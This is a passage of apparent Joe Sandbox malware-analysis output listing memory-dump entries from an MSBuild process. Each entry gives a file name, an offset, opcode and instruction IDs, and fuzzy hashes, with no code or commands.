                                                          • Opcode Fuzzy Hash: 0175217555ca809daaaabd08077c62fd55d938d95548815472cd24f0a7443a5c
                                                          • Instruction Fuzzy Hash: 64C19178E01218CFDB54DFA5C984B9DBBB2BF89300F1081AAD409AB355DB355E85CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eddd21c0ae132c362e5be198ec95080843a86d08af2c8c721e8c74bbbe93227a
                                                          • Instruction ID: b3c53f7a49440e3d89e595378ad1bdc5d827d6bd1cdc20726c5dd8f508f188f7
                                                          • Opcode Fuzzy Hash: eddd21c0ae132c362e5be198ec95080843a86d08af2c8c721e8c74bbbe93227a
                                                          • Instruction Fuzzy Hash: CFC19178E05218CFDB54DFA5C984BDDBBB2BB89300F1081AAD409AB365DB359E85CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e0db96222d05d9406d8f94a2ad73f895a3a700448b877530ff21b6b02a7acc5
                                                          • Instruction ID: 0c91241de4adb0980b9e760d19163e592bf9c8e2ce4ee136a2741104055f6454
                                                          • Opcode Fuzzy Hash: 8e0db96222d05d9406d8f94a2ad73f895a3a700448b877530ff21b6b02a7acc5
                                                          • Instruction Fuzzy Hash: 28C18174E05218CFDB54DFA9C984BDDBBB2BB89304F1081AAD409AB355DB359E81CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a98852803c49cdd71b709690b457494a1301eda025d444efa8e4422234e1483
                                                          • Instruction ID: 6b07a2b5a5f8799c3ee560deecb6c8d3452b5c5c71e2430f61f370681a20c227
                                                          • Opcode Fuzzy Hash: 0a98852803c49cdd71b709690b457494a1301eda025d444efa8e4422234e1483
                                                          • Instruction Fuzzy Hash: 53C18F78E05218CFDB54DFA9C984B9DBBB2BF89300F1081AAD409AB365DB355E85CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc64e03b354e79d0cb27d9fd3341b331f01c6eba8f341c96a853abc777e5084d
                                                          • Instruction ID: 11aed30378150040e0daadbd8f05064142e9091abe295adc8661ea7ef596ca4d
                                                          • Opcode Fuzzy Hash: cc64e03b354e79d0cb27d9fd3341b331f01c6eba8f341c96a853abc777e5084d
                                                          • Instruction Fuzzy Hash: 6AC19178E00218CFDB54DFA5C984B9DBBB2BB89300F1081AAD409AB365DB355E85CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac31dc6b79312b27172352a6e2192f364b7a005c757b5b6d3c8bd606f7534736
                                                          • Instruction ID: 1120094e03ab5965efb1865a26b9ca30f92b0ba16301da996018a342804d9809
                                                          • Opcode Fuzzy Hash: ac31dc6b79312b27172352a6e2192f364b7a005c757b5b6d3c8bd606f7534736
                                                          • Instruction Fuzzy Hash: CBC19078E01218DFDB54DFA9C984BDDBBB2BB89300F1081AAD409AB365DB355E85CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 428212463d818887e1e2b52549676e82155ea7e7ff37580a5f92bea7826049fb
                                                          • Instruction ID: f72776209b268cb996dd129c1a6595d0c6dcb531a12eb14506f72bc94ff2ff6d
                                                          • Opcode Fuzzy Hash: 428212463d818887e1e2b52549676e82155ea7e7ff37580a5f92bea7826049fb
                                                          • Instruction Fuzzy Hash: EBA10474E00208CFEB14DFA9C948BDDBBB1FF88314F2082AAD449AB295DB745985CF54
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e4ca1be0f0a9ac2e085376595f88283d3489bff09dafc61cd744f56b0b2236e
                                                          • Instruction ID: c2c129d22a2fd4ba015c3ef8ee28d93dfacdbd1c467fbb5aeb4ee17cad790081
                                                          • Opcode Fuzzy Hash: 5e4ca1be0f0a9ac2e085376595f88283d3489bff09dafc61cd744f56b0b2236e
                                                          • Instruction Fuzzy Hash: 4CA1F574E00208CFEB14DFA9C948BDDBBB1FF88304F2082A9D409AB295DB759985CF54
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 783cf9172e7e97f346c2082856d1e89e1248797e2161bb9cd35e619e018f4e74
                                                          • Instruction ID: 2dcf3df42866d3f5f1b0da35145554f50c1fcf43f55dc020dae3f67ac3274bd2
                                                          • Opcode Fuzzy Hash: 783cf9172e7e97f346c2082856d1e89e1248797e2161bb9cd35e619e018f4e74
                                                          • Instruction Fuzzy Hash: 5F910574D00208CFEB50DFA8C948BDDBBB1FF89310F20869AE449AB291DB759985CF54
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57dee235d01f5273e55776fd7d99b60021fe4935d010cafd9216cbd9af534199
                                                          • Instruction ID: ac148d7a76c6e2393119f1ca88ed25051f0de41127ae63d6a2d2aaef711b9a1b
                                                          • Opcode Fuzzy Hash: 57dee235d01f5273e55776fd7d99b60021fe4935d010cafd9216cbd9af534199
                                                          • Instruction Fuzzy Hash: 5E512374D0520ACFDB14EFA8D584BEDBBB9FF89300F24812AD485AB298C7759981CF51
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c3abb71b61898562cd8885d31a39a008cb3b010384f8bcfb3acbc9756f1e5fb
                                                          • Instruction ID: dfcbd8fd6cc9a01cc653e9eed6ed3fdea86ee3646e85b84b0b648dfab23709d0
                                                          • Opcode Fuzzy Hash: 7c3abb71b61898562cd8885d31a39a008cb3b010384f8bcfb3acbc9756f1e5fb
                                                          • Instruction Fuzzy Hash: 4B513474D0120ADFDB04EFA8D5887EEBBFABB88300F24C129D444AB298D7759981CF55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \;q$\;q$\;q$\;q
                                                          • API String ID: 0-2933265366
                                                          • Opcode ID: cc04ae3fe8766454eddbe29c570217b501fd7ee0fd9acde9401dfe95cffabb1c
                                                          • Instruction ID: 4d59ad1d0d8229fba7377154e60c6002138f6f08f25c6605ddac360d2ce13d24
                                                          • Opcode Fuzzy Hash: cc04ae3fe8766454eddbe29c570217b501fd7ee0fd9acde9401dfe95cffabb1c
                                                          • Instruction Fuzzy Hash: 3401F231700115AFC761CA2DC440AA937EEBFC97A472941ABE986CF371DE32DD428750